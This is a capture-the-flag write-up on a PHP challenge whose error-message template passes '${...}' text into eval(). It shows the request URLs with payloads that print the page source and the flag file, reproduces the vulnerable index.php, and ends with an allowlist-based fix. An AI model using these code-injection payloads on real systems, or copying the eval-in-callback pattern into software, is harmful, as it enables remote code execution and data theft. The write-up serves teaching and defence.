Challenge Description

We need a developer to make a small debug on our application.

Flag format: UNR{}

Flag proof

UNR{26ym3y-aqqqep-idhz4s-boxxwi-o5enrq-tpviyj-sp5wjw-dszds3}

Summary

Use the template injection to get remote code execution and display the contents of the flag file.

Details

After opening up the website, we get this page:

[screenshot of the page]

The challenge description mentions debugging, so we enable debug mode using: http://35.198.93.134:30918/?err=Maintance+Mode+On&debug=true . This gives us the following notice, which confirms that debugging works:

Notice: Undefined variable: lol in /var/www/html/index.php on line 20

The title alludes to template injection, so we try:

Template injection: http://35.198.93.134:30918/?err=${{1+1}}&debug

This gives us the error:

Notice: Undefined variable: lol in /var/www/html/index.php on line 20

Parse error: syntax error, unexpected '{', expecting ';' in /var/www/html/index.php(24) : eval()'d code on line 1

The parse error shows that our input reaches an eval() call. We then use only a single "{" and "}" and try to display the source of "index.php" to see the code we are working with.

source -> http://35.198.93.134:30918/?err=;${show_source("index.php")};&debug

 <?php

// disable errors by default
ini_set('display_startup_errors', 0);
ini_set('display_errors', 0);
error_reporting(0);

// enable errors if debug param is sent
if (isset($_GET['debug'])) {
    ini_set('display_startup_errors', 1);
    ini_set('display_errors', 1);
    error_reporting(-1);
}

if (!isset($_GET['err'])) {
    header('Location: /?err=Maintance+Mode+On');
    exit;
}

$err = $_GET['err'] . $lol;
$err = preg_replace_callback(
    '/\\$\\{([^\\}]+)\\}/',
    function($match) {
        $var = eval("return $match[1];");
        return ${$var};
    },
    $err);
$err = htmlspecialchars($err);
?>

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="referrer" content="origin-when-crossorigin">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="author" content="<https://twitter.com/nytr0gen_>">

    <title>Templates</title>
    <style>
       body {
           background: #222;
           color: #ccc;
        }
        .main {
            margin: 0 auto;
            width: 400px;
            height: 400px;
            margin-top: 40px;
            border: 6px solid #55f;
            border-radius: 6px;
            padding: 10px;
        }
    </style>
</head>
<body>
    <div class="main">
        <?=$err?>
    </div>
</body>
</html>

After testing different names for the flag file, we find the correct one, which is simply called flag. To display its contents we run show_source("flag"). So, the URL is: http://35.198.93.134:30918/?err=${show_source("flag")}&debug

and we get: UNR{26ym3y-aqqqep-idhz4s-boxxwi-o5enrq-tpviyj-sp5wjw-dszds3}
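
The root cause in index.php is that the text captured between "${" and "}" is passed to eval() and then used as a variable name. As an added example (not part of the original write-up or the challenge's code), the same placeholder substitution can be done as a lookup in a fixed allowlist. The function name render_template and the placeholder names and values are assumptions made for illustration.

```php
<?php
// Added example, not the challenge's code: ${name} substitution without eval().
// The placeholder names and values below are constructed for illustration.

/**
 * Replace ${name} placeholders using a fixed allowlist of values.
 * Anything that is not a plain identifier, or is not in the allowlist,
 * is left in place as literal text.
 */
function render_template(string $input, array $allowed): string
{
    $out = preg_replace_callback(
        // Identifiers only: no quotes, parentheses or operators can match
        '/\$\{([A-Za-z_][A-Za-z0-9_]*)\}/',
        function (array $m) use ($allowed): string {
            // Look the name up in data, never in code or in variable scope
            return array_key_exists($m[1], $allowed)
                ? (string) $allowed[$m[1]]
                : $m[0];
        },
        $input
    );

    // Encode once, after substitution, for the HTML body context
    return htmlspecialchars($out ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed allowlist of template values
$allowed = [
    'status'  => 'Maintenance Mode On',
    'contact' => 'ops@example.test',
];

// Constructed inputs: one legitimate placeholder, the payloads from this
// write-up, and an unknown placeholder name
$samples = [
    'Site status: ${status}',
    '${show_source("flag")}',
    ';${show_source("index.php")};',
    '${{1+1}}',
    '${unknown}',
];

foreach ($samples as $s) {
    echo render_template($s, $allowed), PHP_EOL;
}
```

With this version the payloads used above are echoed back HTML-encoded instead of being executed, because nothing from the request is ever evaluated as PHP.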